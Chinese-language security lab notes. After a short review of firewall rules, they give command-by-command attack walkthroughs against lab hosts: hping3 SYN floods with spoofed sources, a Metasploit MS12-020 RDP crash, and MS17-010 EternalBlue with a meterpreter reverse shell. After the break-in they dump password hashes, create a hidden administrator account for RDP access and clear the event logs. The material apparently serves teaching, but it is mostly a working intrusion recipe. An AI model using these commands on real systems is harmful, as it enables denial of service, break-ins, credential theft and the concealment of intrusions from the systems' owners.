人生没有回头路,你走的每一步都算数!你阳光,世界会因你而温暖!请坚定信念向前!
====================================================
回顾:
1,接口的默认规则
--允许出站连接 ---从高的安全区域访问低的安全区域
--禁止入站连接----禁止从低的安全级别访问高的安全级别
--禁止相同的安全级别互相通信
2,用ACL 匹配 -----安全策略
实现低的安全级别访问高的安全级别---放行
3,NAPT EASYIP
======================
DOS 拒绝服务
常见的攻击方式为洪水攻击 如 SYN flood /ping flood
TCP 三次握手 利用其缺陷实现资源占用导致服务器不能正常提供服务
hping3 -i 发包的时间间隔 1S=1000ms
1ms=1000us
-a 伪造源地址
-p 目的端口
-S 指的使使用SYN flood攻击
--rand-source 随机源地址
实验环境: 一台KALI 一台2003 互通 打开2003远程桌面功能
root@kali:~# hping3 -i u10 -a 2.2.2.2 -p 3389 -S 192.168.0.129
------------ ------------ ------------ --------- --------------
间隔10微秒 源地址 目标端口 攻击方式 目标IP
==
冰盾防火墙---软件防火墙 ,能够防御2000多种黑客攻击行为
==
DDOS 分布式 拒绝服务攻击
root@kali:~# hping3 -i u10 -p 3389 -S --rand-source 192.168.0.129
==========================
漏洞 ------利用漏洞攻击
------利用漏洞入侵
利用MSF攻击框架实施攻击-----使攻击变得特别容易
利用已知的Windows MS12-020 远程桌面的漏洞实施攻击
实验环境:一台kali ;一台2003
在2003里 用systeminfo 查看系统信息,看漏洞补丁是否安全,如果安装控制面板--卸载程序-卸载更新补丁
在KALI操作:
root@kali:~# msfconsole //进入到MSF攻击框架
msf > search dos //搜索所有的漏洞
msf > search ms12-020 //查询MS12-020漏洞
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids //应用该漏洞
msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > show options //查看漏洞选项信息
msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set rhost 192.168.0.129
//设置攻击的目标主机
msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > run //执行
2003现象:蓝屏
----------------
利用漏洞入侵 :利用MS17-010 -----勒索病毒
利用MSF攻击框架
利用meterpreter 渗透工具实施渗透
实验环境:一台KALI ;一台WIN7
root@kali:~# msfconsole //利用攻击框架
msf > search dos //查找系统所有漏洞
msf > search ms17-010 //查看ms17-010漏洞
msf > use exploit/windows/smb/ms17_010_eternalblue //应用漏洞
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
//设置反弹端口,使远程主机连接到此端口(与渗透工具关联)
msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.0.10 //设置攻击的目标主机
msf exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.0.128//设置攻击的源主机
msf exploit(windows/smb/ms17_010_eternalblue) > exploit //利用
meterpreter > pwd //进入到渗透视图
----------------------
认证算法:MD5 信息摘要算法 128签名 效率高 安全性比SHA差一点
SHA 安全散列算法 160签名 256 512 ----------保证数据的完整性 /防止篡改
----------------------
meterpreter > hashdump //获取本地账户和密码-----可以在线MD5加密解密
admin:1000:aad3b435b51404eeaad3b435b51404ee:【32ed87bdb5fdc5e9cba88547376818d4】:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
----------------------
meterpreter > screenshot //截图
----------------------
启动远程桌面--远程登陆
meterpreter > run getgui -e 启动gui程序
meterpreter > shell //进入到shell视图(及win7系统命令行下)
C:\Windows\system32>net user tedu tedu /add //创建用户及密码
C:\Windows\system32>net localgroup administrators tedu /add //将tedu账户加入到管理员组
C:\Windows\system32>net localgroup "Remote Desktop Users" tedu /add //将tedu账户加入到远程登陆组
进入到win7系统查看下:计算机右键---管理---用户和组--用户账户
--------
新建终端:远程登陆到win7
root@kali:~# rdesktop -u tedu -p tedu 192.168.0.10:3389
--------
C:\Windows\system32>exit
meterpreter > clearev //清除日志
==============================
openvas 免费的 开源的 扫描工具 ------目标主机----常用的漏扫工具
下载----耗时
安装----耗时
openvast-start 打开
----新建扫描任务
----查看扫描结果